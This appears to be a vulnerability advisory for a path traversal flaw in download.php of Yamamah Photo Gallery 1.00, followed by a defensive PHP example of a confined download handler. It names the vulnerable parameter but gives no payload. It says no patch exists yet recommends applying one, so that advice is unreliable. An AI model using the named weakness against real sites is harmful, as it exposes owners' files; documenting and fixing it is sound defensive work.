vendor: Yamamah Photo Gallery
by: mat
CVSS: 5.5 (MEDIUM)
Local File Disclosure
CWE: 22
Product Name: Yamamah Photo Gallery
Affected Version From: 1
Affected Version To: 1
Patch Exists: NO
Related CWE:
CPE:
Platforms Tested:
Yamamah Photo Gallery 1.00 (download.php) Local File Disclosure Vulnerability
The vulnerability allows an attacker to disclose local files on the target system by exploiting a flaw in the 'download.php' script of Yamamah Photo Gallery version 1.00. By manipulating the 'download' parameter, an attacker can traverse the file system and access sensitive files.
Mitigation:
To mitigate this vulnerability, it is recommended to apply the latest patch or upgrade to a newer version of Yamamah Photo Gallery that addresses this issue. Additionally, it is advised to restrict access to the 'download.php' script and implement proper input validation and sanitization.
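The input validation recommended above, sketched as an added example; this is not code from Yamamah Photo Gallery. The directory `GALLERY_DIR`, the helper `resolve_download()` and the file-name allow-list are assumptions, and only the `download` parameter name comes from the advisory.

```php
<?php
// Added example, not the project's code: confine a download handler to one directory.
// GALLERY_DIR is an assumed location; the advisory does not name the real one.
const GALLERY_DIR = __DIR__ . '/gallery';

/**
 * Map a user-supplied file name to a regular file inside $baseDir.
 * Returns the canonical path, or null when the request must be refused.
 */
function resolve_download(string $baseDir, string $requested): ?string
{
    // Allow-list (assumed naming policy): plain file names only, so no
    // slashes, backslashes, NUL bytes, or names made solely of dots.
    if (!preg_match('/\A[A-Za-z0-9][A-Za-z0-9._-]*\z/', $requested)) {
        return null;
    }
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // realpath() resolves "..", "." and symlinks, so the prefix comparison
    // below is made on the file that would actually be opened.
    $path = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($path === false || !is_file($path)) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null; // e.g. a symlink pointing outside the gallery directory
    }
    return $path;
}

if (PHP_SAPI !== 'cli') {
    $name = $_GET['download'] ?? '';
    $file = is_string($name) ? resolve_download(GALLERY_DIR, $name) : null;
    if ($file === null) {
        http_response_code(404); // same response for "missing" and "refused"
        exit;
    }
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    // basename($file) passed the allow-list, so it is safe inside the quoted value.
    header('Content-Disposition: attachment; filename="' . basename($file) . '"');
    header('Content-Length: ' . filesize($file));
    readfile($file);
    exit;
}
```

The allow-list and the `realpath()` containment check are independent layers: the first rejects path syntax in the parameter, the second still holds if a symlink or a later code change puts something unexpected inside the directory.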